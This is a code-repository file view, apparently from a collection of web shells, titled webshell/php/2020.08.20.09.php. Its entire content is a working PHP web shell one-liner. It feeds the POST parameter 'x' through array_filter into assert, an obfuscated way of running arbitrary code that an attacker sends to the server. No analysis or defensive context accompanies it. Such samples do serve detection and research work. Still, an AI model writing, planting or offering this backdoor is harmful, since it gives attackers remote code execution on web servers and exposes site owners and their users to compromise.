webshell/php/2020.08.20.09.php

4 lines
56 B
PHP
Raw Normal View History

<?php
array_filter(array($_POST['x']),'assert');
?>